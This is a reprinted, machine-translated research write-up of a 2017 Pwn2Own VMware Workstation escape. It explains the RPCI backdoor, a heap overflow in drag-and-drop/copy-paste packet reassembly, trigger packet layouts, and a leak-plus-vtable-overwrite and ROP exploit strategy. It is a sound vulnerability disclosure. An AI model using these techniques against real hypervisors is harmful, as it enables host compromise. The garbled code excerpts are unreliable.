1. Introduction
In March 2017, changting Security Research Lab (Chaitin) participated in the Pwn2Own Hacker contest, and as a member of the team, I have focused on the VMware Workstation Pro hack, and successfully completed a virtual machine escape exploit before the game. Fortunately, the day before the Pwn2Own race (March 14), VMware released a new version that fixes the vulnerabilities we exploited. In this article, I'll cover the entire process from discovering vulnerabilities to completing exploits. Thanks to @kelwin for their help in implementing the exploit process, and also to the friends of ZDI, who recently released a related blog post that prompted us to complete this writeup article.
This article mainly consists of three parts: first we will briefly introduce the RPCI mechanism in VMware, and then we will describe the vulnerabilities used in this article, and finally explain how we used this vulnerability to bypass ASLR and implement code execution.
2. VMware RPCI mechanism
VMware implements a variety of modes of communication between virtual machines (hereafter referred to as guest) and host hosts (hereinafter, host). One way to do this is through an interface called backdoor, which is a fun way to design, and the guest can send commands through the interface just in the user's state. VMware Tools also partially used this interface to communicate with host. Let's take a look at some of the relevant code (excerpt from lib/backdoor/backdoorgcc64.c in Open-vm-tools):
void Backdoor_inout (Backdoor_proto *mybp)//in/out {UInt64 dummy; __asm__ __volatile__ (#ifdef __apple__ * * * Save%RBX on the stack because the Mac OS GCC doesn ' t want us to * clobber it-it erroneously thinks%RBX is the PIC register. * (Radar bug 7304232) */"Pushq%%rbx" "\n\t" #endif "Pushq%%rax" "\n\t" "Movq (%%rax),%%rdi" "\n\t" "Movq (%%rax),%%rsi" "\n\t" "Movq (%%rax),%%RDX" "\n\t" "Movq 16 (%%rax),%%RCX "" \n\t "" Movq 8 (%%rax),%%rbx "" \n\t "" Movq (%%rax),%%rax "" \n\t "" Inl%%dx,%%eax "\n\t"/* nb:there is no inq instruction */"Xchgq%%rax, (%%RSP)" "\n\t" "Movq%%rdi, + (%%rax)" "\n\t" "Movq%%rsi, (%%rax)" "\n\t" "Movq%%rdx, (%%rax)" "\n\t" "Movq%%rcx, (%%rax)" "\n\t" "Movq%%RBX, 8 (%%rax)" "\n\t" "POPQ (%%rax)" "\n\t" #ifdef __apple__ "Popq%%rbx" "\n\t" #endif: "=a" (Dummy): "0" (MYBP)/* * VMware can modify the whole VM state without t He compiler knowing * it. So far it does not modify eflags. --hpreg */: #ifndef __apple__/*%RBX is unchanged at the end of the function on Mac OS. */"RBX", #endif "RCX", "RDX", "RSI", "RDI", "Memory");}
A very strange command inl appears in the above code. In a typical environment (such as the default I/O permission settings under Linux), the user-state program is unable to execute the I/O instructions, because this instruction only causes the user to make the program error and crash. In this case, the permission errors generated by this instruction are captured by the hypervisor on the host to enable communication. The ability of the backdoor to communicate directly with the host from the user-state program on the guest brings an interesting attack surface that meets the requirements of Pwn2Own: "In this type (the challenge of Virtual machine escape), The attack must originate from the guest's non-administrator account and implement arbitrary code in the host operating system. " Guest will deposit 0x564d5868 $eax
, I/O port number 0x5658 or 0x5659 are stored in $dx
, respectively, corresponding to low bandwidth and high bandwidth communication. Other registers are used to pass parameters, such as the low 16 bits of $ECX, which are used to store command numbers. For RPCI Communication, the command number is set to BDOOR_CMD_MESSAGE(=30)
. The file lib/include/backdoor_def.h
contains a list of supported backdoor commands. After the host catches the error, it reads the command number and distributes it to the appropriate handler function. Here I omit a lot of details, if you are interested to read the relevant source code.
2.1 RPCI
The remote procedure call interface, RPCI, is Procedure based on the backdoor mechanism mentioned earlier. Depending on the mechanism, guest can send a request to host to complete certain operations, such as drag-and-drop (Drag n drop)/copy-paste (copy Paste) operations, sending or obtaining information, and so on. The format of the RPCI request is very simple:< commands > < parameters >. For example RPCI request Info-get Guestinfo.ip can be used to get the guest IP address. For each RPCI command, there are related registration and processing operations in the VMWARE-VMX process.
It is important to note that some RPCI commands are implemented based on VMCI sockets, but this content is beyond the scope of this article.
3. Vulnerability
After taking some time to reverse the various RPCI processing functions, I decided to focus on analyzing drag-and-drop (Drag n drop, hereinafter referred to as DnD) and copy-paste (copy Paste, hereinafter referred to as CP) functionality. This is probably the most complex RPCI command, and the most likely place to find a loophole. After an in-depth understanding of the internal working mechanism of the DND/CP, it is easy to see that many of these functions cannot be called without user interaction. The core functionality of DND/CP maintains a state machine in which many states cannot be reached without user interaction, such as dragging the mouse from host to guest.
I decided to take a look at the exploited vulnerability on Pwnfest 2016, which is mentioned in this VMware security bulletin. At this point my IDB has been marked with many symbols, so it is easy to find the location of the patch through Bindiff. The following code is a function of patching the previous vulnerability (can be seen services/plugins/dndcp/dnddndCPMsgV4.c
in the corresponding source code, the vulnerability still exists in the Open-vm-tools git repository in the Master branch):
Static Bool dndcpmsgv4ispacketvalid (const uint8 *packet, size_t packetsize) {DnDCPMsgHdrV4 *ms GHDR = NULL; ASSERT (packet); if (PacketSize < dnd_cp_msg_headersize_v4) {return FALSE; } MSGHDR = (DnDCPMsgHdrV4 *) packet; /* Payload size is not valid. */if (Msghdr->payloadsize > Dnd_cp_packet_max_payload_size_v4) {return FALSE; }/* Binary size is not valid. */if (Msghdr->binarysize > Dnd_cp_msg_max_binary_size_v4) {return FALSE; }/* Payload size is more than binary size. */if (Msghdr->payloadoffset + msghdr->payloadsize > Msghdr->binarysize) {//[1] return FALSE; } return TRUE; Bool dndcpmsgv4_unserializemultiple (DnDCPMsgV4 *msg, const uint8 *packet, size_t packetsize) {DnDCPMsgHdrV4 *msghdr = NULL; ASSERT (msg); ASSERT (packet); if (! Dndcpmsgv4ispacketvalid (packet, packetsize)) {return FALSE; } MSGHDR= (DNDCPMSGHDRV4 *) packet; /* For each session, there are at the most 1 big message. If the received * SessionId is different with buffered one, the received packet are for * Another another new message . Destroy old buffered message. */if (msg->binary && msg->hdr.sessionid! = Msghdr->sessionid) {Dndcpmsgv4_destroy (msg); }/* Offset should is 0 for new message. */if (NULL = = Msg->binary && Msghdr->payloadoffset! = 0) {return FALSE; }/* For existing buffered message, the payload offset should match. */if (msg->binary && Msg->hdr.sessionid = = Msghdr->sessionid && Msg->hdr.payloa Doffset! = Msghdr->payloadoffset) {return FALSE; } if (NULL = = msg->binary) {memcpy (msg, MSGHDR, dnd_cp_msg_headersize_v4); Msg->binary = Util_safemalloc (msg->hdr.binarysize); }/* Msg->hdr.payloadoffset is used as received binary size. */memcpy (Msg->binary + msg->hdr.payloadoffset, packet + dnd_cp_msg_headersize_v4, msghdr->payloadsize); [2] Msg->hdr.payloadoffset + = msghdr->payloadsize; return TRUE;}
For the DND/CP feature of Version 4, when guest sends a shard DND/CP command packet, host invokes the function above to reorganize the DND/CP message sent by guest. The first packet received must satisfy the buffer length allocated on the heap by Payloadoffset to 0,binarysize. [1] The inspection compares the binarysize in the Baotou, to ensure that Payloadoffset and payloadsize will not cross the border. At [2], the data is copied into the allocated buffer. However, the check at [1] is problematic, it is only valid for the first packet received, and for subsequent packets, this check is not valid because the code expects the binarysize in the header and the first packet in the Shard stream to be the same, but you can actually specify a larger binarysize in the subsequent package To satisfy the check and trigger a heap overflow.
Therefore, the vulnerability could be triggered by sending the following two shards:
packet 1{ ... binarySize = 0x100 payloadOffset = 0 payloadSize = 0x50 sessionId = 0x41414141 ... #...0x50 bytes...#}packet 2{ ... binarySize = 0x1000 payloadOffset = 0x50 payloadSize = 0x100 sessionId = 0x41414141 ... #...0x100 bytes...#}
With this knowledge, I decided to see if there was a similar problem with the DND/CP feature in Version 3. Surprisingly, almost the same flaw exists in Version 3 's code, which was first discovered by reverse analysis, but we later realized that V3 's code was also in Open-vm-tools's Git repository:
Bool Dnd_transportbufappendpacket (Dndtransportbuffer *buf,//In/out DNDTRANSPORTP Acketheader *packet,//In size_t packetsize)//in{ASSERT (BUF); ASSERT (PacketSize = = (packet->payloadsize + dnd_transport_packet_header_size) && packetsize <= DND_ Max_transport_packet_size && (packet->payloadsize + packet->offset) <= packet->totalsize & ;& packet->totalsize <= Dndmsg_max_argsz); if (packetsize! = (packet->payloadsize + dnd_transport_packet_header_size) | | PacketSize > Dnd_max_transport_packet_size | | (Packet->payloadsize + packet->offset) > Packet->totalsize | | [1] packet->totalsize > Dndmsg_max_argsz) {goto error; }/* * If SeqNum does not match, it means either the IT's the first packet, or there * is a timeout in another side . Reset the buffer in all cases. */IF (buf->seqnum! = packet->seqnum) {dnd_transportbufreset (BUF); } if (!buf->buffer) {ASSERT (!packet->offset); if (packet->offset) {goto error; } Buf->buffer = Util_safemalloc (packet->totalsize); Buf->totalsize = packet->totalsize; Buf->seqnum = packet->seqnum; Buf->offset = 0; } if (Buf->offset! = packet->offset) {goto error; } memcpy (Buf->buffer + buf->offset, packet->payload, packet->payloadsize); Buf->offset + = packet->payloadsize; Return True;error:dnd_transportbufreset (BUF); return FALSE;}
The DND/CP of Version 3 is called when the Shard is reorganized. Here we can see in [1] the same situation as before, the code still assumes that the totalsize in subsequent shards will match the first Shard. Therefore, this vulnerability can be triggered in the same way as before:
packet 1{ ... totalSize = 0x100 payloadOffset = 0 payloadSize = 0x50 seqNum = 0x41414141 ... #...0x50 bytes...#}packet 2{ ... totalSize = 0x1000 payloadOffset = 0x50 payloadSize = 0x100 seqNum = 0x41414141 ... #...0x100 bytes...#}
In a game like Pwn2Own, this loophole is weak because it is only inspired by the previous loopholes and can even be said to be the same. So it's not surprising that such a loophole was patched before the game (well, maybe we don't want this loophole to be repaired the day before the game). The corresponding VMware security bulletins are here. The latest version of VMWare Workstation Pro affected by this vulnerability is 12.5.3.
Next, let's take a look at how this vulnerability is being used to escape from guest to host!
4. Exploit
To implement code execution, we need to overwrite a function pointer on the heap, or break the virtual table pointer of a C + + object.
First let's take a look at how to set the DND/CP protocol to version 3 and send the following RPCI commands in turn:
tools.capability.dnd_version 3 tools.capability.copypaste_version 3 vmx.capability.dnd_version vmx.capability.copypaste_version
The first two lines of messages have the DnD and Copy/paste versions set up, and the next two lines are used to query the version, which is necessary because only the query version will actually trigger the version switch. The RPCI command vmx.capability.dnd_version
checks to see if the version of the DND/CP protocol has been modified, and if so, creates a corresponding version of the C + + object. For version 3, 2 C + + objects of size 0xa8 are created, one for the DnD command and the other for the Copy/paste command.
This vulnerability not only allows us to control the size of allocations and the size of the overflow, but also allows us to write multiple crossings. Ideally, we could use it to allocate a block of memory of size 0xa8, and let it be allocated before the C + + object, and then use the heap overflow to overwrite the vtable pointer of the C + + object to point to the controllable memory for code execution.
This is not an easy thing to do before we have to solve some other problems. First we need to find a way to bypass ASLR while processing the Windows low fragmented Heap.
4.1 Bypassing ASLR
In general, we need to find an object that affects it through overflow and then implements information disclosure. For example, it destroys an object with a length or data pointer and can be read from the guest, but we do not find this object. So we reversed more RPCI command processing functions to find what was available. Those paired commands are especially interesting, such as you can set up some data with a command, and retrieve the data with related commands, and finally we find a pair of commands Info-set and Info-get:
info-set guestinfo.KEY VALUE info-get guestinfo.KEY
VALUE is a string, and the length of the string can control the allocated length of buffer on the heap, and we can allocate as many strings as possible. But how do you use these strings to leak data? We can let the string connect the contiguous block of memory by spilling out the null bytes that cover the end. If we were able to allocate a string between the memory block where the overflow occurred and the DnD or CP object, we could leak the object's
Vtable address so that we can know the address of VMWARE-VMX. Although the LFH heap allocation for Windows is randomized, we can allocate as many strings as possible, thus increasing the likelihood of implementing the above heap layout, but we still have no control over whether the DnD or CP objects are assigned after the overflow buffer. After our testing, we can achieve a success rate of 60% to 80% by adjusting some parameters, such as allocating and releasing different numbers of strings.
Summarizes the heap layout we built (the OV represents the overflow memory block, and s represents the target object for string,t).
Our strategy is to first allocate some strings filled with "A", then write some "B" through the overflow, then read all the allocated strings, which contain "B" is the overflow string. So we find a string that can be used to read the leaked data, and then continue to overflow with the granularity of the bucket's memory block size 0xa8, checking the leaked data after each overflow. Since the vtable of the DnD and CP objects are fixed from the VMWARE-VMX base address, it is only necessary to check the lowest data bits after each overflow to determine if the overflow has reached the target object.
4.2 Get Code Execution
Now that we have the information leak, we can know which C + + object overflowed, and then implement the code. We need to deal with two situations: overflow copypaste and DnD. It is necessary to point out that there are a lot of code paths available, and we just chose one.
4.2.1 Overriding Copypaste objects
For the Copypaste object, we can override the virtual table pointer to point to other data that we can control. We need to find a pointer to the data that the pointer points to is controllable and used as the virtual table of the object. For this we have used another RPCI command unity.window.contents.start
. This command is primarily used in Unity mode to draw some images on host. This operation allows us to write some data to a location that is known relative to the VMWARE-VMX offset. The parameter that the command receives is the width and height of the image, both of which are 32 bits, and we combine it to get a 64-bit data at a known location. We use it as a pointer in the virtual table to trigger the virtual function call by sending a copypast command, in the following steps:
- Sends
unity.window.contents.start
a command to write a 64-bit stack migration gadget address to the global variable by specifying the parameter width and height
- Override object virtual table pointer to fake virtual table (Adjust virtual table address offset)
- Send Copypaste command to trigger virtual function call
- ROP
4.2.2 Overriding DND objects
For the DnD object, we cannot just overwrite the vtable pointer, because the vtable will be accessed immediately after the overflow, and the other virtual function will be called, and we cannot control a larger virtual table until we can control only one qword with the width and height of the unity image.
Let's take a look at the structure of the DnD and CP objects, as summarized below (some similar structures can be found in Open-vm-tools, but will be slightly different in vmware-vmx):
DnD_CopyPaste_RpcV3{ void * vtable; ... uint64_t ifacetype; RpcUtil{ void * vtable; RpcBase * mRpc; DnDTransportBuffer{ uint64_t seqNum; uint8_t * buffer; uint64_t totalSize; uint64_t offset; ... } ... }}RpcBase{ void * vtable; ...}
Here we omit many of the properties that are not related to this article in the structure. There is a pointer to another C + + object in the object Rpcbase, if we can overwrite the mRpc field with a pointer to a controllable data, we control the vtable of Rpcbase. For this we can continue to use the unity.window.contents.start
command to control mRpc, another parameter of the command is Imgsize, which represents the size of the allocated image buffer. When this buffer is allocated, its address will have a fixed offset at vmware-vmx. We can use commands unity.window.contents.chunk
to populate the contents of the buffer. The steps are as follows:
- Send the Unity.window.contents.start command to allocate a buffer, and later we use it to store a forged vtable.
- Send the Unity.window.contents.chunk command to populate the forged vtable, which fills in a stack of migrated gadget
- Overwrite the Mrpc field of the DnD object with an overflow to point to the place where the buffer address is stored (at a global variable), a pointer to a pointer that is written
- To trigger a virtual function call to the MRPC domain by sending the DND command
- ROP
The P.S:VMWARE-VMX process has a readable writable executable memory page (at least in version 12.5.3).
4.3 Stability Discussion
As mentioned earlier, because of the randomization of the Windows LFH heap, the current exploit cannot achieve a 100% success rate. However, you can try the following methods to improve the success rate:
- Observe 0xa8 size memory allocations, and consider whether there are some malloc and free calls to achieve deterministic LFH allocations, refer here and here.
- Look for other C + + objects on the heap, especially those that can be sprayed on the heap.
- Look for other objects on the heap with function pointers, especially those that can be sprayed on the heap.
- To find a separate information disclosure vulnerability
- Open more brain holes.
4.4 Demo Effect
Demo Video: VMware Workstation 12.5.3 Escape Demo
"Reprint" Implement VMware virtual machine escape with a heap overflow vulnerability